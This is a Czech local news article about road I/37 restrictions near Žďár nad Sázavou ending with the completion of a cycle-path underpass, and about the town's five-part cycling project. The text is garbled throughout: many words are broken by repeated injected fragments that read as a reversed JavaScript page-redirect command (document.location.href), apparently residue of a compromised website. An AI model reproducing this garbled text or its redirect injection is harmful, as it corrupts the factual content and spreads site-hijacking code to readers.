Rainbow page separator

Omezení provozu na silnici nad Žďárem skončí závěrem září

Pátek, 13. září 2019

Žďár nad Sázavou / Na konec září je naplánován závěr stavebních prací na podjezdu silnice I/37 v souvislosti s výstavbou nové cyklostezky, čímž skončí i dopravní omezení na frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované komunikaci. Stará polní cesta od Pilské nádrže ke Stržanovu, na jejímž místě je vytyčená nová cyklostezka, v těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dnech dostává nový asfal[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tový povrch. V rámci výstavby dojde k vytvoření 963 metrů dlouhé cyklostezky, která cyklisty mimo jiné podchodem bezpečně převede přes frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovanou státní silnici I/37, cyklotrasy a 135 metrů dlouhého pik[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];togramového koridoru na vozovce. Za tubusem pod silnicí bude trasa pokračovat přes vyhlídkové mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nad Žďárem a dál po zpevněné místní komunikaci do Stržanova. Žďárská radnice tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to počinem naváže na projekt rozvoje cyklotras a cyklostezek Subregionu Velké Dářko.
Projekt rozvoje cyklodopravy ve Žďáře, jehož je nová cyklostezka součástí, čítá celkem pět částí. Mimo propojení Piláku se Stržanovem jde o cyklostezku přes řeku Sázavu, která zahrne 176 metrů cyklostezky a sedmadvacetimetrovou lávku za zimním stadionem. Dalším počinem se stane 372 metrů dlouhá stezka pro cyklisty spojující ulice 1. máje a Žižkova. Ve Farských humnech přibude 31,5 metru dlouhá lávka a spojovací stezka. Na základech pro pilíře té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lávky začnou dělníci pracovat ještě le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos. Závěrečnou částí projektu, který bude s dotační podporou dokončen v příštím roce, se stane vytvoření pik[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];togramových koridorů na 408 metrech v ulici Sázavská a na 1124 metrech v úseku od ulice 1. máje směrem ke žďárskému nádraží.